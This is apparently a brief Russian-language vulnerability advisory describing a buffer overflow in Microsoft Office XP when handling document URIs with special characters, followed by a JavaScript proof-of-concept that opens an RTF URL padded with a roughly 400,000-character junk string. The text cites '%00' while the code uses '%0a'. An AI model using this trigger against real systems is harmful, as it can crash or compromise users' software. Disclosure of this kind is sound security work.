Программа: Microsoft Office XP
Уязвимость позволяет злоумышленнику
выполнить произвольный код на уязвимой
системе с привилегиями текущего
пользователя. Уязвимость обнаружена при
обработке URI документа, содержащего символы
‘%00’ в Microsoft Office. Удаленный атакующий может
вызвать переполнение буфер с помощью
специально сформированного имени
документа и выполнить произвольный код на
уязвимой системе.
Пример:
<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
< /script>
